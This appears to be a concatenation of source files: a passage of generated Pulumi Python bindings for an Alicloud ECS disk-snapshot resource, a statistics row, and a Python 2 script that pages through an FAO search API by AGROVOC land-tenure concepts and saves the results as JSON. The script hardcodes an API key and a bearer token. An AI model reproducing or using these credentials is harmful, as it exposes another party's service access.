Description of the snapshot. This description can have a string of 2 to 256 characters, It cannot begin with http:// or https://. Default value is null.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="diskId")
def disk_id(self) -> Optional[pulumi.Input[str]]:
"""
The source disk ID.
"""
return pulumi.get(self, "disk_id")
@disk_id.setter
def disk_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "disk_id", value)
@property
@pulumi.getter
def force(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "force")
@force.setter
def force(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "force", value)
@property
@pulumi.getter(name="instantAccess")
def instant_access(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "instant_access")
@instant_access.setter
def instant_access(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "instant_access", value)
@property
@pulumi.getter(name="instantAccessRetentionDays")
def instant_access_retention_days(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "instant_access_retention_days")
@instant_access_retention_days.setter
def instant_access_retention_days(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "instant_access_retention_days", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the snapshot to be created. The name must be 2 to 128 characters in length. It must start with a letter and cannot start with http:// or https://. It can contain letters, digits, colons (:), underscores (_), and hyphens (-).
It cannot start with auto, because snapshot names starting with auto are recognized as automatic snapshots.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="resourceGroupId")
def resource_group_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the resource group.
"""
return pulumi.get(self, "resource_group_id")
@resource_group_id.setter
def resource_group_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_id", value)
@property
@pulumi.getter(name="retentionDays")
def retention_days(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "retention_days")
@retention_days.setter
def retention_days(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "retention_days", value)
@property
@pulumi.getter(name="snapshotName")
def snapshot_name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "snapshot_name")
@snapshot_name.setter
def snapshot_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "snapshot_name", value)
@property
@pulumi.getter
def status(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "status")
@status.setter
def status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "status", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "tags", value)
class Snapshot(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
category: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
disk_id: Optional[pulumi.Input[str]] = None,
force: Optional[pulumi.Input[bool]] = None,
instant_access: Optional[pulumi.Input[bool]] = None,
instant_access_retention_days: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_id: Optional[pulumi.Input[str]] = None,
retention_days: Optional[pulumi.Input[int]] = None,
snapshot_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
__props__=None):
"""
## Import
Snapshot can be imported using the id, e.g.
```sh
$ pulumi import alicloud:ecs/snapshot:Snapshot snapshot s-abc1234567890000
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: Description of the snapshot. This description can have a string of 2 to 256 characters, It cannot begin with http:// or https://. Default value is null.
:param pulumi.Input[str] disk_id: The source disk ID.
:param pulumi.Input[str] name: The name of the snapshot to be created. The name must be 2 to 128 characters in length. It must start with a letter and cannot start with http:// or https://. It can contain letters, digits, colons (:), underscores (_), and hyphens (-).
It cannot start with auto, because snapshot names starting with auto are recognized as automatic snapshots.
:param pulumi.Input[str] resource_group_id: The ID of the resource group.
:param pulumi.Input[Mapping[str, Any]] tags: A mapping of tags to assign to the resource.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: SnapshotArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
## Import
Snapshot can be imported using the id, e.g.
```sh
$ pulumi import alicloud:ecs/snapshot:Snapshot snapshot s-abc1234567890000
```
:param str resource_name: The name of the resource.
:param SnapshotArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(SnapshotArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
category: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
disk_id: Optional[pulumi.Input[str]] = None,
force: Optional[pulumi.Input[bool]] = None,
instant_access: Optional[pulumi.Input[bool]] = None,
instant_access_retention_days: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_id: Optional[pulumi.Input[str]] = None,
retention_days: Optional[pulumi.Input[int]] = None,
snapshot_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = SnapshotArgs.__new__(SnapshotArgs)
__props__.__dict__["category"] = category
__props__.__dict__["description"] = description
if disk_id is None and not opts.urn:
raise TypeError("Missing required property 'disk_id'")
__props__.__dict__["disk_id"] = disk_id
__props__.__dict__["force"] = force
__props__.__dict__["instant_access"] = instant_access
__props__.__dict__["instant_access_retention_days"] = instant_access_retention_days
if name is not None and not opts.urn:
warnings.warn("""Field 'name' has been deprecated from provider version 1.120.0. New field 'snapshot_name' instead.""", DeprecationWarning)
pulumi.log.warn("""name is deprecated: Field 'name' has been deprecated from provider version 1.120.0. New field 'snapshot_name' instead.""")
__props__.__dict__["name"] = name
__props__.__dict__["resource_group_id"] = resource_group_id
__props__.__dict__["retention_days"] = retention_days
__props__.__dict__["snapshot_name"] = snapshot_name
__props__.__dict__["tags"] = tags
__props__.__dict__["status"] = None
super(Snapshot, __self__).__init__(
'alicloud:ecs/snapshot:Snapshot',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
category: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
disk_id: Optional[pulumi.Input[str]] = None,
force: Optional[pulumi.Input[bool]] = None,
instant_access: Optional[pulumi.Input[bool]] = None,
instant_access_retention_days: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_id: Optional[pulumi.Input[str]] = None,
retention_days: Optional[pulumi.Input[int]] = None,
snapshot_name: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, Any]]] = None) -> 'Snapshot':
"""
Get an existing Snapshot resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: Description of the snapshot. This description can have a string of 2 to 256 characters, It cannot begin with http:// or https://. Default value is null.
:param pulumi.Input[str] disk_id: The source disk ID.
:param pulumi.Input[str] name: The name of the snapshot to be created. The name must be 2 to 128 characters in length. It must start with a letter and cannot start with http:// or https://. It can contain letters, digits, colons (:), underscores (_), and hyphens (-).
It cannot start with auto, because snapshot names starting with auto are recognized as automatic snapshots.
:param pulumi.Input[str] resource_group_id: The ID of the resource group.
:param pulumi.Input[Mapping[str, Any]] tags: A mapping of tags to assign to the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _SnapshotState.__new__(_SnapshotState)
__props__.__dict__["category"] = category
__props__.__dict__["description"] = description
__props__.__dict__["disk_id"] = disk_id
__props__.__dict__["force"] = force
__props__.__dict__["instant_access"] = instant_access
__props__.__dict__["instant_access_retention_days"] = instant_access_retention_days
__props__.__dict__["name"] = name
__props__.__dict__["resource_group_id"] = resource_group_id
__props__.__dict__["retention_days"] = retention_days
__props__.__dict__["snapshot_name"] = snapshot_name
__props__.__dict__["status"] = status
__props__.__dict__["tags"] = tags
return Snapshot(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def category(self) -> pulumi.Output[Optional[str]]:
return pulumi.get(self, "category")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
Description of the snapshot. This description can have a string of 2 to 256 characters, It cannot begin with http:// or https://. Default value is null.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="diskId")
def disk_id(self) -> pulumi.Output[str]:
"""
The source disk ID.
"""
return pulumi.get(self, "disk_id")
@property
@pulumi.getter
def force(self) -> pulumi.Output[Optional[bool]]:
return pulumi.get(self, "force")
@property
@pulumi.getter(name="instantAccess")
def instant_access(self) -> pulumi.Output[Optional[bool]]:
return pulumi.get(self, "instant_access")
@property
@pulumi.getter(name="instantAccessRetentionDays")
def instant_access_retention_days(self) -> pulumi.Output[Optional[int]]:
return pulumi.get(self, "instant_access_retention_days")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the snapshot to be created. The name must be 2 to 128 characters in length. It must start with a letter and cannot start with http:// or https://. It can contain letters, digits, colons (:), underscores (_), and hyphens (-).
It cannot start with auto, because snapshot names starting with auto are recognized as automatic snapshots.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="resourceGroupId")
def resource_group_id(self) -> pulumi.Output[Optional[str]]:
"""
The ID of the resource group.
"""
return pulumi.get(self, "resource_group_id")
@property
@pulumi.getter(name="retentionDays")
def retention_days(self) -> pulumi.Output[Optional[int]]:
return pulumi.get(self, "retention_days")
@property
@pulumi.getter(name="snapshotName")
def snapshot_name(self) -> pulumi.Output[str]:
return pulumi.get(self, "snapshot_name")
@property
@pulumi.getter
def status(self) -> pulumi.Output[str]:
return pulumi.get(self, "status")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, Any]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
| 45.113752 | 275 | 0.645717 | 3,242 | 26,572 | 5.077113 | 0.060457 | 0.084872 | 0.115431 | 0.073512 | 0.897631 | 0.882139 | 0.865067 | 0.856804 | 0.83949 | 0.816403 | 0 | 0.005632 | 0.244919 | 26,572 | 588 | 276 | 45.190476 | 0.814743 | 0.233027 | 0 | 0.828784 | 1 | 0.014888 | 0.118739 | 0.018861 | 0 | 0 | 0 | 0 | 0 | 1 | 0.16129 | false | 0.002481 | 0.012407 | 0.049628 | 0.270471 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
1cc3796e6fc2eeaf602badbb245d1a2c248859fc | 27,398 | py | Python | landlibrary/importers/FAOdocrep/faodocuments-2017/faodocrep-retrieve.py | landportal/data | 465c4ff4ec71bbb55bf74643561fb8284b46211b | [
"MIT"
] | null | null | null | landlibrary/importers/FAOdocrep/faodocuments-2017/faodocrep-retrieve.py | landportal/data | 465c4ff4ec71bbb55bf74643561fb8284b46211b | [
"MIT"
] | 4 | 2016-11-23T16:12:54.000Z | 2021-06-07T11:47:36.000Z | landlibrary/importers/FAOdocrep/faodocuments-2017/faodocrep-retrieve.py | landportal/data | 465c4ff4ec71bbb55bf74643561fb8284b46211b | [
"MIT"
] | 1 | 2017-02-02T12:46:20.000Z | 2017-02-02T12:46:20.000Z | import requests
import json
from fileinput import filename
def retrieve():
endpoint = "https://api.fao.org/api/gsa/1.0.0"
#TODO extract to a variable
retrieve_list = {
"common lands" : "http://aims.fao.org/aos/agrovoc/c_1782",
"deforestation" : "http://aims.fao.org/aos/agrovoc/c_15590",
"desertification" : "http://aims.fao.org/aos/agrovoc/c_2204",
"dryland management" : "http://aims.fao.org/aos/agrovoc/c_9000036",
"farmland" : "http://aims.fao.org/aos/agrovoc/c_2808",
"forest conservation" : "http://aims.fao.org/aos/agrovoc/c_1374158672853",
"forest degradation" : "http://aims.fao.org/aos/agrovoc/c_331593",
"forest grazing" : "http://aims.fao.org/aos/agrovoc/c_3046",
"forest land" : "http://aims.fao.org/aos/agrovoc/c_24843",
"forest land use" : "http://aims.fao.org/aos/agrovoc/c_1374157828575",
"forest resources" : "http://aims.fao.org/aos/agrovoc/c_3050",
"geographical information systems" : "http://aims.fao.org/aos/agrovoc/c_35131",
"grassland management" : "http://aims.fao.org/aos/agrovoc/c_3364",
"housing" : "http://aims.fao.org/aos/agrovoc/c_3678",
"indigenous tenure systems" : "http://aims.fao.org/aos/agrovoc/c_9000081",
"individual land property" : "http://aims.fao.org/aos/agrovoc/c_9000082",
"land" : "http://aims.fao.org/aos/agrovoc/c_4172",
"land access" : "http://aims.fao.org/aos/agrovoc/c_9000090",
"land administration" : "http://aims.fao.org/aos/agrovoc/c_9000091",
"land classification" : "http://aims.fao.org/aos/agrovoc/c_15991",
"land cover" : "http://aims.fao.org/aos/agrovoc/c_37897",
"land cover mapping" : "http://aims.fao.org/aos/agrovoc/c_9000094",
"land degradation" : "http://aims.fao.org/aos/agrovoc/c_34823",
"land improvement" : "http://aims.fao.org/aos/agrovoc/c_28717",
"land management" : "http://aims.fao.org/aos/agrovoc/c_24866",
"land markets" : "http://aims.fao.org/aos/agrovoc/c_4175",
"land ownership" : "http://aims.fao.org/aos/agrovoc/c_28718",
"land policies" : "http://aims.fao.org/aos/agrovoc/c_195",
"land productivity" : "http://aims.fao.org/aos/agrovoc/c_4176",
"land reform" : "http://aims.fao.org/aos/agrovoc/c_4178",
"land registration" : "http://aims.fao.org/aos/agrovoc/c_9000098",
"land resources" : "http://aims.fao.org/aos/agrovoc/c_4179",
"land rights" : "http://aims.fao.org/aos/agrovoc/c_37898",
"land suitability" : "http://aims.fao.org/aos/agrovoc/c_15992",
"land tax" : "http://aims.fao.org/aos/agrovoc/c_4180",
"land tenure" : "http://aims.fao.org/aos/agrovoc/c_12069",
"land transfers" : "http://aims.fao.org/aos/agrovoc/c_4181",
"land use" : "http://aims.fao.org/aos/agrovoc/c_4182",
"land use mapping" : "http://aims.fao.org/aos/agrovoc/c_9000100",
"land use planning" : "http://aims.fao.org/aos/agrovoc/c_37899",
"landowners" : "http://aims.fao.org/aos/agrovoc/c_4184",
"multiple land use" : "http://aims.fao.org/aos/agrovoc/c_28734",
"natural resources" : "http://aims.fao.org/aos/agrovoc/c_5091",
"natural resources management" : "http://aims.fao.org/aos/agrovoc/c_9000115",
"pastoral society" : "http://aims.fao.org/aos/agrovoc/c_28741",
"pastoralism" : "http://aims.fao.org/aos/agrovoc/c_16144",
"private ownership" : "http://aims.fao.org/aos/agrovoc/c_6192",
"property rights" : "http://aims.fao.org/aos/agrovoc/c_37942",
"public ownership" : "http://aims.fao.org/aos/agrovoc/c_6350",
"rangelands" : "http://aims.fao.org/aos/agrovoc/c_6448",
"reforestation" : "http://aims.fao.org/aos/agrovoc/c_13802",
"resource management" : "http://aims.fao.org/aos/agrovoc/c_6524",
"right of access" : "http://aims.fao.org/aos/agrovoc/c_6604",
"soil degradation" : "http://aims.fao.org/aos/agrovoc/c_7168",
"soil management" : "http://aims.fao.org/aos/agrovoc/c_7176",
"spatial database" : "http://aims.fao.org/aos/agrovoc/c_9000154",
"sustainable forest management" : "http://aims.fao.org/aos/agrovoc/c_331342",
"sustainable land management" : "http://aims.fao.org/aos/agrovoc/c_36580",
"tenure" : "http://aims.fao.org/aos/agrovoc/c_7669",
"urban agriculture" : "http://aims.fao.org/aos/agrovoc/c_35707",
"urban areas" : "http://aims.fao.org/aos/agrovoc/c_8085",
"urban planning" : "http://aims.fao.org/aos/agrovoc/c_37948",
"urbanization" : "http://aims.fao.org/aos/agrovoc/c_8088",
"valuation" : "http://aims.fao.org/aos/agrovoc/c_8152",
"water management" : "http://aims.fao.org/aos/agrovoc/c_8320",
"water resources" : "http://aims.fao.org/aos/agrovoc/c_8325",
"water rights" : "http://aims.fao.org/aos/agrovoc/c_16062",
}
stats={}
for agrovoc_label, agrovoc_uri in retrieve_list.iteritems():
print agrovoc_label
next=0
all_results = []
year_start=1850
year_end=2016
agrovoc_uri_enconded = "http%3A%252F%252Faims%252Efao%252Eorg%252Faos%252Fagrovoc%252F" + str.replace(agrovoc_uri,"http://aims.fao.org/aos/agrovoc/","")
# problems with the encode of the agrovoc urlagrovoc_uri_enconded
next_relative_url = "/search?client=docrep&output=xml_no_dtd&site=faodocrep&partialfields=&requiredfields=(agrovoc_id%3A"+ agrovoc_uri_enconded +").docRepCollection%3Adocuments&filter=0&q=+inmeta%3Ayear%3A"+str(year_start)+".."+str(year_end)+"&proxystylesheet=xml_to_json&getfields=*&dnavs=&start=0&apikey=c335a12f-a850-4816-aed5-51ab7f723f12&ulang=en&language=en&sort=meta%3Ayear%3AD%3ASD%3AY"
while (next_relative_url):
response = requests.get(endpoint+next_relative_url, headers={"Accept":"application/json","Authorization" : "Bearer 8ce6f29360faa9ee4fcf29b749d455e"})
data = response.json()
stats[agrovoc_label] = 0
if 'current_page' in data['pagination']:
current_page = data['pagination']['current_page']
else: #no results for that concept
next_relative_url = None
continue
stats[agrovoc_label] = data['GSP']['RES']['M']
next+=10
if ('NB' in data['GSP']['RES'] and 'NU' in data['GSP']['RES'] ['NB']):
next_relative_url = "/search?client=docrep&output=xml_no_dtd&site=faodocrep&partialfields=&requiredfields=(agrovoc_id%3A"+agrovoc_uri_enconded+").docRepCollection%3Adocuments&filter=0&q=+inmeta%3Ayear%3A"+str(year_start)+".."+str(year_end)+"&proxystylesheet=xml_to_json&getfields=*&dnavs=&start="+str(next)+"&apikey=c335a12f-a850-4816-aed5-51ab7f723f12&ulang=en&language=en&sort=meta%3Ayear%3AD%3ASD%3AY"
else:
next_relative_url = None
#save the results in a file
filename="results-"+agrovoc_label+"-"+current_page+".json"
with open(filename, 'w') as outfile:
json.dump(data, outfile)
print("written file="+filename)
#concat the results
partial_results = data['GSP']['RES'] ['results']
all_results =all_results + partial_results
with open("all-results+"+agrovoc_label+".json", 'w') as outfile:
json.dump(all_results, outfile)
print("written file ALL -"+agrovoc_label+"- results")
print stats
def retrieve_stats():
endpoint = "https://api.fao.org/api/gsa/1.0.0"
retrieve_list = {
"common lands" : "http://aims.fao.org/aos/agrovoc/c_1782",
"deforestation" : "http://aims.fao.org/aos/agrovoc/c_15590",
"desertification" : "http://aims.fao.org/aos/agrovoc/c_2204",
"dryland management" : "http://aims.fao.org/aos/agrovoc/c_9000036",
"farmland" : "http://aims.fao.org/aos/agrovoc/c_2808",
"forest conservation" : "http://aims.fao.org/aos/agrovoc/c_1374158672853",
"forest degradation" : "http://aims.fao.org/aos/agrovoc/c_331593",
"forest grazing" : "http://aims.fao.org/aos/agrovoc/c_3046",
"forest land" : "http://aims.fao.org/aos/agrovoc/c_24843",
"forest land use" : "http://aims.fao.org/aos/agrovoc/c_1374157828575",
"forest resources" : "http://aims.fao.org/aos/agrovoc/c_3050",
"geographical information systems" : "http://aims.fao.org/aos/agrovoc/c_35131",
"grassland management" : "http://aims.fao.org/aos/agrovoc/c_3364",
"housing" : "http://aims.fao.org/aos/agrovoc/c_3678",
"indigenous tenure systems" : "http://aims.fao.org/aos/agrovoc/c_9000081",
"individual land property" : "http://aims.fao.org/aos/agrovoc/c_9000082",
"land" : "http://aims.fao.org/aos/agrovoc/c_4172",
"land access" : "http://aims.fao.org/aos/agrovoc/c_9000090",
"land administration" : "http://aims.fao.org/aos/agrovoc/c_9000091",
"land classification" : "http://aims.fao.org/aos/agrovoc/c_15991",
"land cover" : "http://aims.fao.org/aos/agrovoc/c_37897",
"land cover mapping" : "http://aims.fao.org/aos/agrovoc/c_9000094",
"land degradation" : "http://aims.fao.org/aos/agrovoc/c_34823",
"land improvement" : "http://aims.fao.org/aos/agrovoc/c_28717",
"land management" : "http://aims.fao.org/aos/agrovoc/c_24866",
"land markets" : "http://aims.fao.org/aos/agrovoc/c_4175",
"land ownership" : "http://aims.fao.org/aos/agrovoc/c_28718",
"land policies" : "http://aims.fao.org/aos/agrovoc/c_195",
"land productivity" : "http://aims.fao.org/aos/agrovoc/c_4176",
"land reform" : "http://aims.fao.org/aos/agrovoc/c_4178",
"land registration" : "http://aims.fao.org/aos/agrovoc/c_9000098",
"land resources" : "http://aims.fao.org/aos/agrovoc/c_4179",
"land rights" : "http://aims.fao.org/aos/agrovoc/c_37898",
"land suitability" : "http://aims.fao.org/aos/agrovoc/c_15992",
"land tax" : "http://aims.fao.org/aos/agrovoc/c_4180",
"land tenure" : "http://aims.fao.org/aos/agrovoc/c_12069",
"land transfers" : "http://aims.fao.org/aos/agrovoc/c_4181",
"land use" : "http://aims.fao.org/aos/agrovoc/c_4182",
"land use mapping" : "http://aims.fao.org/aos/agrovoc/c_9000100",
"land use planning" : "http://aims.fao.org/aos/agrovoc/c_37899",
"landowners" : "http://aims.fao.org/aos/agrovoc/c_4184",
"multiple land use" : "http://aims.fao.org/aos/agrovoc/c_28734",
"natural resources" : "http://aims.fao.org/aos/agrovoc/c_5091",
"natural resources management" : "http://aims.fao.org/aos/agrovoc/c_9000115",
"pastoral society" : "http://aims.fao.org/aos/agrovoc/c_28741",
"pastoralism" : "http://aims.fao.org/aos/agrovoc/c_16144",
"private ownership" : "http://aims.fao.org/aos/agrovoc/c_6192",
"property rights" : "http://aims.fao.org/aos/agrovoc/c_37942",
"public ownership" : "http://aims.fao.org/aos/agrovoc/c_6350",
"rangelands" : "http://aims.fao.org/aos/agrovoc/c_6448",
"reforestation" : "http://aims.fao.org/aos/agrovoc/c_13802",
"resource management" : "http://aims.fao.org/aos/agrovoc/c_6524",
"right of access" : "http://aims.fao.org/aos/agrovoc/c_6604",
"soil degradation" : "http://aims.fao.org/aos/agrovoc/c_7168",
"soil management" : "http://aims.fao.org/aos/agrovoc/c_7176",
"spatial database" : "http://aims.fao.org/aos/agrovoc/c_9000154",
"sustainable forest management" : "http://aims.fao.org/aos/agrovoc/c_331342",
"sustainable land management" : "http://aims.fao.org/aos/agrovoc/c_36580",
"tenure" : "http://aims.fao.org/aos/agrovoc/c_7669",
"urban agriculture" : "http://aims.fao.org/aos/agrovoc/c_35707",
"urban areas" : "http://aims.fao.org/aos/agrovoc/c_8085",
"urban planning" : "http://aims.fao.org/aos/agrovoc/c_37948",
"urbanization" : "http://aims.fao.org/aos/agrovoc/c_8088",
"valuation" : "http://aims.fao.org/aos/agrovoc/c_8152",
"water management" : "http://aims.fao.org/aos/agrovoc/c_8320",
"water resources" : "http://aims.fao.org/aos/agrovoc/c_8325",
"water rights" : "http://aims.fao.org/aos/agrovoc/c_16062",
}
stats={}
for agrovoc_label, agrovoc_uri in retrieve_list.iteritems():
agrovoc_uri_enconded = "http%3A%252F%252Faims%252Efao%252Eorg%252Faos%252Fagrovoc%252F" + str.replace(agrovoc_uri,"http://aims.fao.org/aos/agrovoc/","")
# problems with the encode of the agrovoc urlagrovoc_uri_enconded
next_relative_url = "/search?client=docrep&output=xml_no_dtd&site=faodocrep&partialfields=&requiredfields=(agrovoc_id%3A"+ agrovoc_uri_enconded +").docRepCollection%3Adocuments&filter=0&q=&proxystylesheet=xml_to_json&getfields=*&dnavs=&start=0&apikey=c335a12f-a850-4816-aed5-51ab7f723f12&ulang=en&language=en&sort=meta%3Ayear%3AD%3ASD%3AY"
response = requests.get(endpoint+next_relative_url, headers={"Accept":"application/json","Authorization" : "Bearer 8ce6f29360faa9ee4fcf29b749d455e"})
data = response.json()
stats[agrovoc_label] = 0
if 'current_page' in data['pagination']:
current_page = data['pagination']['current_page']
else: #no results for that concept
next_relative_url = None
continue
stats[agrovoc_label] = data['GSP']['RES']['M']
print agrovoc_label + ";" + str(data['GSP']['RES']['M'])
print stats
#retrieve_stats()
#for k,v in {'land use planning': u'53', 'natural resources management': u'343', 'land productivity': u'22', 'right of access': u'81', 'land classification': u'39', 'forest land use': u'75', 'pastoral society': u'14', 'land administration': u'51', 'geographical information systems': u'46', 'land registration': u'29', 'forest degradation': u'63', 'land cover mapping': u'20', 'land resources': u'106', 'forest conservation': u'60', 'dryland management': u'44', 'urbanization': u'49', 'farmland': u'25', 'land suitability': u'22', 'water resources': u'269', 'land cover': u'20', 'desertification': u'69', 'individual land property': u'90', 'sustainable forest management': u'552', 'landowners': u'31', 'land tax': u'25', 'urban planning': u'17', 'forest grazing': u'27', 'forest resources': u'763', 'reforestation': u'147', 'land transfers': u'28', 'pastoralism': u'32', 'land degradation': u'68', 'sustainable land management': u'85', 'spatial database': u'11', 'private ownership': u'39', 'land rights': u'128', 'resource management': u'568', 'soil management': u'316', 'deforestation': u'207', 'land improvement': u'18', 'property rights': u'95', 'rangelands': u'80', 'forest land': u'240', 'land tenure': u'403', 'valuation': u'16', 'urban areas': u'92', 'multiple land use': u'20', 'land access': u'100', 'land policies': u'117', 'land': u'57', 'public ownership': u'34', 'natural resources': u'277', 'common lands': u'30', 'water management': u'314', 'housing': u'67', 'land use': u'383', 'soil degradation': u'99', 'water rights': u'33', 'land management': u'136', 'land markets': u'35', 'indigenous tenure systems': u'86', 'tenure': u'465', 'grassland management': u'54', 'land reform': u'117', 'land use mapping': u'28', 'urban agriculture': u'32', 'land ownership': u'212'}.iteritems():
# print k +";"+ str(v)
# initial_retrieve_list = {
# "agropastoral systems" : "http://aims.fao.org/aos/agrovoc/c_16112",
# "alienation (land)" : "http://aims.fao.org/aos/agrovoc/c_ceb73ce1",
# "cadastral administration" : "http://aims.fao.org/aos/agrovoc/c_d774aa00",
# "cadastral register" : "http://aims.fao.org/aos/agrovoc/c_b4d51db0",
# "cadastres" : "http://aims.fao.org/aos/agrovoc/c_1177",
# "capital value (land)" : "http://aims.fao.org/aos/agrovoc/c_a9966ac9",
# "co-ownership rights" : "http://aims.fao.org/aos/agrovoc/c_599d2e5c",
# "commons" : "http://aims.fao.org/aos/agrovoc/c_778a14cf",
# "common property" : "http://aims.fao.org/aos/agrovoc/c_9000022",
# "community forestry" : "http://aims.fao.org/aos/agrovoc/c_16532",
# "customary land rights" : "http://aims.fao.org/aos/agrovoc/c_cd44c0b3",
# "customary tenure" : "http://aims.fao.org/aos/agrovoc/c_56c34d4d",
# "deforestation" : "http://aims.fao.org/aos/agrovoc/c_15590",
# "extensive land use" : "http://aims.fao.org/aos/agrovoc/c_36552",
# "forest land" : "http://aims.fao.org/aos/agrovoc/c_24843",
# "geographical information systems" : "http://aims.fao.org/aos/agrovoc/c_35131",
# "grazing land rights" : "http://aims.fao.org/aos/agrovoc/c_97241aeb",
# "grazing lands" : "http://aims.fao.org/aos/agrovoc/c_3369",
# "indigenous tenure" : "http://aims.fao.org/aos/agrovoc/c_a291ae58",
# "indigenous land rights" : "http://aims.fao.org/aos/agrovoc/c_d42b49e7",
# "indigenous lands" : "http://aims.fao.org/aos/agrovoc/c_86524ff8",
# "intensive land use" : "http://aims.fao.org/aos/agrovoc/c_36551",
# "grazing land rights" : "http://aims.fao.org/aos/agrovoc/c_97241aeb",
# "land access" : "http://aims.fao.org/aos/agrovoc/c_9000090",
# "land acquisitions" : "http://aims.fao.org/aos/agrovoc/c_89d3dcbb",
# "land administration" : "http://aims.fao.org/aos/agrovoc/c_9000091",
# "land area" : "http://aims.fao.org/aos/agrovoc/c_330588",
# "assignment (land)" : "http://aims.fao.org/aos/agrovoc/c_8c6882ab",
# "collateral (land)" : "http://aims.fao.org/aos/agrovoc/c_931da360",
# "land clearing" : "http://aims.fao.org/aos/agrovoc/c_1662",
# "land concentration" : "http://aims.fao.org/aos/agrovoc/c_8654e90e",
# "concession (land)" : "http://aims.fao.org/aos/agrovoc/c_357653f9",
# "land conflicts" : "http://aims.fao.org/aos/agrovoc/c_e236b2b1",
# "land consolidation" : "http://aims.fao.org/aos/agrovoc/c_4173",
# "land cover" : "http://aims.fao.org/aos/agrovoc/c_37897",
# "land cover mapping" : "http://aims.fao.org/aos/agrovoc/c_9000094",
# "land degradation" : "http://aims.fao.org/aos/agrovoc/c_34823",
# "land development (urbanization)" : "http://aims.fao.org/aos/agrovoc/c_4174",
# "Land dispute" : "http://aims.fao.org/aos/agrovoc/c_1ada969a",
# "land distribution" : "http://aims.fao.org/aos/agrovoc/c_37734",
# "land diversion" : "http://aims.fao.org/aos/agrovoc/c_28716",
# "dowry (land)" : "http://aims.fao.org/aos/agrovoc/c_f7cf8606",
# "land economics" : "http://aims.fao.org/aos/agrovoc/c_25195",
# "encroachment" : "http://aims.fao.org/aos/agrovoc/c_a245096c",
# "land environment" : "http://aims.fao.org/aos/agrovoc/c_7ffc9d69",
# "eviction" : "http://aims.fao.org/aos/agrovoc/c_0b88a82c",
